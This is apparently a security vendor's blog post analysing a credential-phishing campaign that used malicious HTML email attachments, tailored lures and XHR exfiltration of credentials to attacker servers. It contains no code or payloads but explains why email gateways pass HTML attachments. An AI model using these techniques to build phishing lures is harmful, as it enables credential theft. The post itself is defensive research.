It all started when a colleague at Menlo Labs stumbled upon an open directory with usernames and passwords. Looking at the contents of the web server, we identified that this was the result of a single campaign. This campaign was fairly successful and was able to compromise credentials of 164 users at various companies. The threat activity outlined in this post is deemed a Highly Evasive Adaptive Threat (HEAT), which can easily bypass current, traditional security measures.
In the process of analyzing this kit, we came across a unique string “DH4 VIP3R L337.” This started our quest to understand more about this specific kit and actor.
The questions we sought to answer were:
The modus operandi of the bad actors is to send an HTML attachment via email to their potential victims. While most secure email gateways (SEGs) have default blocks for certain file types, HTML attachments are exempt from this level of defense. This is because many large financial firms send encrypted emails that require users to first register and create an account to securely view the message. These encrypted emails are usually in the form of HTML attachments.
The following screenshot (Figure 1) is an example of what gets displayed to the user when they open the malicious HTML attachment.
Our research reveals that attackers seem to be carefully selecting and customizing their lures based on services used by the target company. In total we identified 147 unique lures used by the attackers. The lures ranged from cybersecurity companies to financial services and everything in between.
The submitted user credentials are sent to the attacker’s CnC using an ajax XHR request. Thanks to JCyberSec, who sent us the server side code, we were able to reconstruct the entire attack chain and detail the capabilities of the campaign. The attacker has a unique way of validating the credentials submitted by the victim.
The flow of the attack is as follows:
We believe that the initial HTML attachments are created using a kit to automatically generate these HTML payloads. Menlo Labs researchers spent a significant amount of time looking for the kit, but were ultimately unable to locate it. If there are any researchers who are aware of such a kit, we would love to collaborate with them to understand how these payload generation kits function. However, until we have additional details, we are tracking this payload generation kit as VIP3R_L33T Generator.
Most of the domains to which credentials were sent were registered using the NameCheap domain registration service. The service is both cheap and private for the domain registrant, which in essence hides details about who registered the domain.
The following are monikers that were used by the attackers:
Credential phishing continues to be the number one attack that we see across customers. We’ve seen every single customer across geographies and industry verticals affected by this vector. Roughly 22 percent of attacks that we see across our platform are credential phishing attacks, with 7 percent of those attacks not being detected by legacy URL reputation engines. These legacy URL reputation evasion techniques, dubbed LURE by the Menlo Labs research team, are one of the four evasive techniques found in Highly Evasive Adaptive Threats (HEAT). The Menlo Labs team has observed a massive uptick in HEAT attacks, which take advantage of our inherent cognitive biases and fool us into entering our credentials. That bias, combined with the tactics used by attackers, make these attacks very successful. Increasing cybersecurity awareness through training and education initiatives is often helpful in reducing the impact of credential phishing attacks, but corporate users should always be cautious when a site presents a form that asks for personal or sensitive information.